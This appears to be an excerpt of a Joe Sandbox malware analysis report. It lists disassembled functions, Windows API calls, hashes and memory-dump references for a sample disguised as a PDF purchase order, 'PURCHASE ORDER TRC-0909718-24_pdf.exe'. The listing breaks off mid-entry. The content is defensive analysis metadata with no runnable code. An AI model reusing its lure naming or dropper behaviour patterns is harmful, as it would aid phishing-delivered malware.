Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D

Function 100028A4 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000477,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768

Function 00405CDC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4

Function 00405CAD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D

Function 0040414E Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Non-executed Functions

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNEL32(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(?,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 004045B4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,Call), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00404704
A, xrefs: 004046D7
Call, xrefs: 00404715, 0040471A, 00404725

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
API String ID: 2624150263-3131679198
Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 0040686A Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04

Function 00407041 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95

Function 004042B6 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

